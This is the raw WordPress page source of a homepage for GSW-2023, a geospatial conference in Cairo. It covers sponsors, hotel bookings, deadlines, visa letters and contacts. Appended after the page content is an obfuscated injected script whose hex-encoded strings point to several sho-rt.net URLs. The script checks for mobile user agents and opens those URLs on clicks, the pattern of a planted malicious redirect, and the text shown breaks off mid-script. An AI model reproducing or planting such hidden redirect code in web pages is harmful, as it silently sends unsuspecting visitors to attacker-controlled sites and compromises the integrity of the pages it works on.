style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 